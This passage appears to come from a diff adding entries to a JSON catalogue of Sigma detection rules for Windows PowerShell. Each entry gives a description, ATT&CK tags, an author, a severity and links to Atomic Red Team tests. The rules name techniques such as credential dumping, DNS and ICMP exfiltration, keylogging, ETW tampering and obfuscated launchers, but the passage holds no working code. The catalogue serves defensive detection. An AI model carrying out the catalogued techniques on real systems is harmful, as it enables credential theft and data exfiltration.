"Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "value": "DirectorySearcher Powershell Exploitation", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2022/02/12", + "filename": "posh_ps_directorysearcher.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "value": "Manipulation of User Computer or Group Security Principals Across AD", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.002" + ], + "creation_date": "2021/12/28", + "filename": "posh_ps_directoryservices_accountmanagement.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + 
"uuid": "602f5669-6927-4688-84db-0d4b7afb2150", + "value": "Disable Powershell Command History", + "meta": { + "refs": [ + "https://twitter.com/DissectMalware/status/1062879286749773824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2022/08/21", + "filename": "posh_ps_disable_psreadline_command_history.yml", + "author": "Ali Alwashali", + "level": "high", + "falsepositive": [ + "Legitimate script that disables the command history" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "value": "Disable-WindowsOptionalFeature Command PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/09/10", + "filename": "posh_ps_disable_windowsoptionalfeature.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Dnscat exfiltration tool execution", + "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "value": "Dnscat Execution", + "meta": { + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/24", + "filename": "posh_ps_dnscat_execution.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Legitimate usage of PowerShell Dnscat2 \u2014 DNS Exfiltration tool (unlikely)" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "value": "Dump Credentials from Windows Credential Manager With PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "creation_date": "2021/12/20", + "filename": "posh_ps_dump_password_windows_credential_manager.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", + "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "value": "Enable Windows Remote Management", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2022/01/07", + "filename": "posh_ps_enable_psremoting.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "uuid": "55c925c1-7195-426b-a136-a9396800e29b", + "value": "Enable-WindowsOptionalFeature Command PowerShell", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/10", + "filename": "posh_ps_enable_windowsoptionalfeature.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may search for common password storage locations to obtain user 
credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "uuid": "603c6630-5225-49c1-8047-26c964553e0e", + "value": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "creation_date": "2021/12/20", + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "value": "Disable of ETW Trace - Powershell", + "meta": { + "refs": [ + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ], + "creation_date": "2022/06/28", + "filename": "posh_ps_etw_trace_evasion.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "value": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "meta": { + "refs": [ + 
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2022/10/26", + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the cmdlet to forward emails" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "value": "Powershell File and Directory Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2021/12/15", + "filename": "posh_ps_file_and_directory_discovery.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they 
control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "value": "Service Registry Permissions Weakness Check", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ], + "creation_date": "2021/12/30", + "filename": "posh_ps_get_acl_service.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "value": "Active Directory Computers Enumeration with Get-AdComputer", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_get_adcomputer.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "uuid": 
"8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", + "value": "Active Directory Group Enumeration With Get-AdGroup", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002" + ], + "creation_date": "2022/03/17", + "filename": "posh_ps_get_adgroup.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "value": "Suspicious Get-ADReplAccount", + "meta": { + "refs": [ + "https://www.powershellgallery.com/packages/DSInternals", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ], + "creation_date": "2022/02/06", + "filename": "posh_ps_get_adreplaccount.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", + "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ], + "creation_date": "2021/12/13", + "filename": "posh_ps_get_childitem_bookmarks.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", + "value": "PowerShell Hotfix Enumeration", + "meta": { + "refs": [ + "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" + ], + "tags": [ + "attack.discovery" + ], + "creation_date": "2022/06/21", + "filename": "posh_ps_hotfix_enum.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administration scripts" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. 
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "value": "PowerShell ICMP Exfiltration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2020/10/10", + "filename": "posh_ps_icmp_exfiltration.yml", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate usage of System.Net.NetworkInformation.Ping class" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell scripts that import modules from suspicious directories", + "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "value": "Import PowerShell Modules From Suspicious Directories", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2022/07/07", + "filename": "posh_ps_import_module_susp_dirs.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", + "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "value": "Execute Invoke-command on Remote Host", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2022/01/07", + "filename": "posh_ps_invoke_command_remote.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "value": "Powershell DNSExfiltration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", + "https://github.com/Arno0x/DNSExfiltrator", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ], + "creation_date": "2022/01/07", + "filename": "posh_ps_invoke_dnsexfiltration.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Commandlet name for PrintNightmare exploitation.", + "uuid": "6d3f1399-a81c-4409-aff3-1ecfe9330baf", + "value": "PrintNightmare Powershell Exploitation", + "meta": { + 
"refs": [ + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2021/08/09", + "filename": "posh_ps_invoke_nightmare.yml", + "author": "Max Altgelt, Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "posh_ps_invoke_obfuscation_clip.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "meta": { + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + 
], + "creation_date": "2019/11/08", + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "posh_ps_invoke_obfuscation_stdin.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "posh_ps_invoke_obfuscation_var.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + 
"value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "posh_ps_invoke_obfuscation_via_compress.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "value": "Invoke-Obfuscation Via Stdin - Powershell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": 
"posh_ps_invoke_obfuscation_via_stdin.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "value": "Invoke-Obfuscation Via Use Clip - Powershell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/08", + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + 
"meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/08", + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "posh_ps_invoke_obfuscation_via_var.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_script", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "value": "Powershell Keylogging", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" + ], + "tags": 
